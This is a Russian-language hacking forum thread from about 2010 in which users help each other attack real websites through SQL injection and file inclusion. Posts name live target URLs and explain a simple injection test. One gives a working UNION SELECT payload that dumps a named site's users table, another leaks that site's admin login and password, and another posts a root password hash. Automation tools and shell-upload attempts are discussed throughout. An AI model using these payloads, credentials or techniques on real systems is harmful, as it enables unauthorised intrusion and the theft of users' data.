Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    pinch

    если система linux то попробуй записать в папке /tmp
    думаю права хватит
     
    _________________________
  2. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    tmp хорошо, но никак не задействовать допустим шелл из этой папки... если не ошибаюсь только при помощи локального инклуда.
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    сканируй директории сайта IntelliTamper-ом
     
    _________________________
  4. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    является ли уязвимым сайт, выдающий на кавычку в первом случае:
    во втором случае:
    ???
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    DrakonSerg а кто его знает то? были пару экстрасенсов на ачате, да некоторые в бане от Егорыча так как постоянно его пароль узнавали, а некоторые еще не знают что они экстрасенсы...
    У меня машина не едет, как ты думаешь что в ней сломалось?
     
    1 person likes this.
  6. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    машина не едет, значит что то сломано. То есть осталось поломку только найти, то что она есть уже железно.
    По выдачи этих ошибок возможность инъекции не определить? А как можно определить? Очень сайт нужен тот...
     
  7. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    news.php?id=1
    news.php?id=2-1 если выдается та же страница что и при id=1 то уязвимость есть
     
  8. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    это точно? Выдается та же страница. Чем эту уязвимость можно крутонуть автоматически?
    Вы звиняйте за нубские вопросы. Никогда как то не приходилось с sql плотно стыкаться.
     
  9. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    1) содержимое страницы не должно изменяться (картинки соответственно).
    2) sipt 4.0
    pangolin
    sqlhelper
    toolza
     
  10. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://www.mustad.no/catalog/products.php?id=
    Это PHP-инъекция? Можно ли как нибудь залить шелл?
     
  11. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    sqlihelper 2.7 выдал:
    я так понял нужно брутить названия колонок в таблице. Как?
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    CyberHunter, да, это инклуд, но, скорее всего, файл для инклуда берется из поля БД, id которого - твой GET параметр.
    DrakonSerg, да, надо брутить, т.к., судя по логам, ветка 4-я, в которой нету information_schema.
     
    #13232 mailbrush, 29 May 2010
    Last edited: 29 May 2010
    1 person likes this.
  13. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    mailbrush, т.е. вот так:
    Code:
    http://www.mustad.no/catalog/products.php?id=adress_gde_shell
    но так появляется ошибка (та же самая). Пробовал подставлять нулл байт, не помогло.
     
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    не факт что там allow_url_include=on
    не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)
     
    #13234 pinch, 29 May 2010
    Last edited: 29 May 2010
  15. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Работа SQLI Helper V 2.7
    вывод этого же хелпера:
    чем брутить таблицу? Как до нее вообще добраться?
     
  16. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    А ничего, что там инклуда вообще нет? Что бы ни ставилии в id, в ошибке оно не инклудится
     
  17. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу залить шелл.

    админка:http://zoor.biz/user/

    Username:zbo_admin
    password:shaka13
     
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу залить шелл.

    http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE&id=-6019+union+select+1,2,3,concat_ws(0x3a,uid,
    name,
    pass,
    mail,
    mode,
    sort,
    threshold,
    theme,
    signature,
    signature_format,
    created,
    access,
    login,
    status,
    timezone,
    language,
    picture,
    init,
    data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+hashoo_zbo.users+limit+1,1+--+
     
  19. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11

    В ПМ кинул!!
     
  20. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Блин, ну натолкните на идею или статью... Я уже задолбался.
    Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
    Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?

    ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет

    НАпротив акка root вот такой хеш: 3649d1fc783e0b49
     
    #13240 DrakonSerg, 29 May 2010
    Last edited: 29 May 2010
Thread Status:
Not open for further replies.